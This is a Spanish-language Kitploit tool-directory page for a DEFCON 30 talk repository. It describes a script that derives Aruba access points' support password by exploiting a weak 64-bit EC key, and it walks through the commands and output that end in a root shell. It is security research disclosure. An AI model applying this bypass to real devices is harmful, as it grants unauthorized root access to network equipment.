Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
bugstropics — Material de apoyo para la charla "Hunting Bugs In The Tropics" de DEFCON 30 | Kitploit
Herramientas/GitHubGitHub/dozernz/bugstropics
Seguridad de Sistemas EmbebidosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónSeguridad InalámbricaCriptografíaSeguridad de Hardware e IoT
GitHubdozernz/bugstropics

bugstropics

Material de apoyo para la charla "Hunting Bugs In The Tropics" de DEFCON 30

Ver Repositorio
1277hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cazando bugs en los trópicos

Este es un repositorio con las diapositivas utilizadas en mi presentación «Hunting Bugs in the Tropics» en DEFCON30. Incluye el script de Python utilizado para calcular la contraseña de soporte basándose en la clave privada obtenida al romper la clave pública EC del soporte de Aruba, debido a su débil tamaño (64 bits). Esto permite salir de la subshell en estos dispositivos y obtener una shell root completa.

Puedes usarlo ejecutando support en la CLI del AP y proporcionando un nombre de usuario arbitrario:

root@kitploit:~
# support
Username (Please enter with @domain.com, in lowercase): a

Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:

Después, pasa el nombre de usuario y el valor de Token al script support-access.py de este repositorio.

root@kitploit:~
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c

Pega la respuesta como Support Password:

root@kitploit:~
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root
Descargar herramienta